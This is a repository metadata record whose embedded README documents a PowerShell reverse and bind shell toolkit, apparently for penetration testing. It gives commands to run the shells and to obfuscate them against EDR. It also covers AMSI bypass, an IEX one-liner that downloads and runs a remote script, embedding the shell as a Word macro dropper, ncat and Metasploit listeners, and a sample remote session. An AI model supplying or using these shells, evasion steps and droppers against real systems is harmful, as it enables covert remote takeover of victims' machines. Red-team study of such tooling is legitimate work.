{"id":13641965,"url":"https://github.com/ivan-sincek/powershell-reverse-tcp","last_synced_at":"2025-04-07T13:07:19.266Z","repository":{"id":107019401,"uuid":"195106565","full_name":"ivan-sincek/powershell-reverse-tcp","owner":"ivan-sincek","description":"PowerShell scripts for communicating with a remote host.","archived":false,"fork":false,"pushed_at":"2023-04-27T20:35:11.000Z","size":31,"stargazers_count":301,"open_issues_count":0,"forks_count":67,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-03-31T11:06:04.920Z","etag":null,"topics":["bind-shell","bind-tcp","bug-bounty","defensive-security","ethical-hacking","networking","offensive-security","penetration-testing","powershell","red-team-engagement","reverse-shell","reverse-tcp","security","tcp"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-07-03T18:19:54.000Z","updated_at":"2025-02-28T01:20:08.000Z","dependencies_parsed_at":null,"dependency_job_id":"cc608b0c-db9b-40e4-8af2-363f8fbf2748","html_url":"https://github.com/ivan-sincek/powershell-reverse-tcp","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell
-reverse-tcp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/powershell-reverse-tcp/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247657281,"owners_count":20974345,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bind-shell","bind-tcp","bug-bounty","defensive-security","ethical-hacking","networking","offensive-security","penetration-testing","powershell","red-team-engagement","reverse-shell","reverse-tcp","security","tcp"],"created_at":"2024-08-02T01:01:26.084Z","updated_at":"2025-04-07T13:07:19.243Z","avatar_url":"https://github.com/ivan-sincek.png","language":"PowerShell","readme":"# PowerShell Reverse TCP\n\nPowerShell scripts for communicating with a remote host.\n\nRemote host will have a full control over the client and all the underlying system commands.\n\nCheck shells based on:\n\n* Invoke-Expression PowerShell command [here](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/invoke_expression),\n* process pipes [here](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/process_pipes).\n\nTested with PowerShell v5.1.19041.2673 on Windows 10 Enterprise OS (64-bit).\n\nMade for educational purposes. 
I hope it will help!\n\n**This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.**\n\nFuture plans:\n\n* more shells based on process pipes, and optimize them further.\n\n## Table of Contents\n\n* [How to Run](#how-to-run)\n* [Obfuscate PowerShell Scripts](#obfuscate-powerShell-scripts)\n\t* [PowerShell Encoded Command](#powershell-encoded-command)\n\t* [SecureString](#securestring)\n* [AMSI Bypass](#amsi-bypass)\n* [MS Word Integration](#ms-word-integration)\n* [Set Up a Listener](#set-up-a-listener)\n* [Runtime](#runtime)\n\n## How to Run\n\n**Change the IP address and port number inside the scripts as necessary.**\n\nOpen the PowerShell from [\\\\src\\\\invoke_expression\\\\original\\\\](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/invoke_expression/original) or [\\\\src\\\\process_pipes\\\\original\\\\](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/process_pipes/original) and run the commands shown below.\n\nSet the execution policy:\n\n```pwsh\nSet-ExecutionPolicy Unrestricted\n```\n\nRun the script:\n\n```pwsh\n.\\powershell_reverse_tcp.ps1\n```\n\nOr, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -ExecutionPolicy Unrestricted -File .\\powershell_reverse_tcp.ps1\n```\n\n## Obfuscate PowerShell Scripts\n\nTry to bypass EDR and other security mechanisms by obfuscating your scripts. 
You can see such obfuscations in the examples below.\n\nOriginal PowerShell command:\n\n```pwsh\n(New-Object Net.WebClient).DownloadFile($url, $out)\n```\n\nObfuscated PowerShell command:\n\n```pwsh\n\u0026 (`G`C`M *ke-E*) '(\u0026 (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T).\"`D`O`W`N`L`O`A`D`F`I`L`E\"($url, $out)'\n```\n\n**Check the original PowerShell script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) and the fully obfuscated one [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1).**\n\nAfter [manual obfuscation](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1), the original PowerShell script was obfuscated with [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation). Credits to the author!\n\nSearch the Internet for additional obfuscation techniques and methods.\n\nP.S. Because PowerShell is constantly being updated, some regular expressions (e.g. 
`*ke-E*`) may start to throw exceptions due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.\n\n### PowerShell Encoded Command\n\nTo generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:\n\n```pwsh\n[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))\n```\n\nTo decode a PowerShell encoded command, run the following PowerShell command:\n\n```pwsh\n[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))\n```\n\nUse the one-liners below if you don't want to leave any artifacts behind.\n\n---\n\n**\\[Reverse TCP - Invoke-Expression\\]** To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -Command \"'127.0.0.1', '9000'\" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand 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\n```\n\nThe encoded script will prompt for input. 
See the slightly altered script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1) - used the [minified](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1) script to reduce the command length.\n\n**\\[Reverse TCP - Process Pipes\\]** To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -Command \"'127.0.0.1', '9000'\" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand <Base64-encoded script>\n```\n\nThe encoded script will prompt for input. 
See the slightly altered script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/process_pipes/prompt/powershell_reverse_tcp_prompt.ps1) - used the [minified](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/process_pipes/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1) script to reduce the command length.\n\n---\n\n**\\[Bind TCP - Invoke-Expression\\]** To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -Command \"'9000'\" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand <Base64-encoded script>\n```\n\nThe encoded script will prompt for input. 
See the slightly altered script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/powershell_bind_tcp_prompt.ps1) - used the [minified](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/minified/powershell_bind_tcp_prompt_mini.ps1) script to reduce the command length.\n\n### SecureString\n\nTo generate a PowerShell SecureString from a PowerShell script, run the following PowerShell command (the string can get very long):\n\n```pwsh\nConvertFrom-SecureString -k (0..15) (ConvertTo-SecureString (Get-Content -Path $script -Raw) -AsPlainText -Force)\n```\n\nTo decode and run a PowerShell SecureString, run the following PowerShell command:\n\n```pwsh\nIEX((New-Object System.Net.NetworkCredential(\"\", (ConvertTo-SecureString -k (0..15) $string))).Password)\n```\n\nMost security products will flag a PowerShell script as malicious if the script uses `\u0026` symbol excessively.\n\nCheck the [manually obfuscated](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1) and transformed reverse shell script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/secure_string/powershell_reverse_tcp_secure_string.ps1).\n\nCheck the [manually obfuscated](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_bind_tcp_manual.ps1) and transformed bind shell script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/secure_string/powershell_bind_tcp_secure_string.ps1).\n\n## AMSI Bypass\n\nIf Windows Defender is blocking your PowerShell script or encoded command execution, generate an AMSI bypass code from [AMSI.fail](https://amsi.fail) and run it in your PowerShell session. 
Credits to the author!\n\nAfter running the AMSI bypass code, you can download the content of your PowerShell script from the web using this one-liner:\n\n```pwsh\nIEX([System.IO.StreamReader]::New([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1').GetResponse().GetResponseStream()).ReadToEnd());\n```\n\nFind out more about AMSI bypass at [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell). Credits to the author!\n\n## MS Word Integration\n\nTo embed a PowerShell script into an MS Word document, check [macro_pack](https://github.com/sevagas/macro_pack) tool. Credits to the author!\n\nRun the following command from either PowerShell or Command Prompt:\n\n```fundamental\necho \"https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1\" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc\n```\n\n## Set Up a Listener\n\nTo set up a listener, open your preferred console on Kali Linux and run one of the examples below.\n\nSet up `ncat` listener:\n\n```fundamental\nncat -nvlp 9000\n```\n\nSet up `multi/handler` listener:\n\n```fundamental\nmsfconsole -q\n\nuse exploit/multi/handler\n\nset PAYLOAD windows/shell_reverse_tcp\n\nset LHOST 192.168.8.185\n\nset LPORT 9000\n\nexploit\n```\n\n## Runtime\n\n```fundamental\n┌──(root💀kali)-[~]\n└─# ncat -nvlp 9000\nNcat: Version 7.93 ( https://nmap.org/ncat )\nNcat: Listening on :::9000\nNcat: Listening on 0.0.0.0:9000\nNcat: Connection from 192.168.1.109.\nNcat: Connection from 192.168.1.109:50418.\nPS\u003eGet-Host\n\n\nName             : ConsoleHost\nVersion          : 5.1.19041.2673\nInstanceId       : 3d17d7be-e720-4f39-93a2-cf509887f57a\nUI               : System.Management.Automation.Internal.Host.InternalHostUserInterface\nCurrentCulture   : hr-HR\nCurrentUICulture : en-US\nPrivateData  
    : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy\nDebuggerEnabled  : True\nIsRunspacePushed : False\nRunspace         : System.Management.Automation.Runspaces.LocalRunspace\n\n\n\nPS\u003e\n```\n","funding_links":[],"categories":["PowerShell","PowerShell (153)"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpowershell-reverse-tcp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fpowershell-reverse-tcp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpowershell-reverse-tcp/lists"}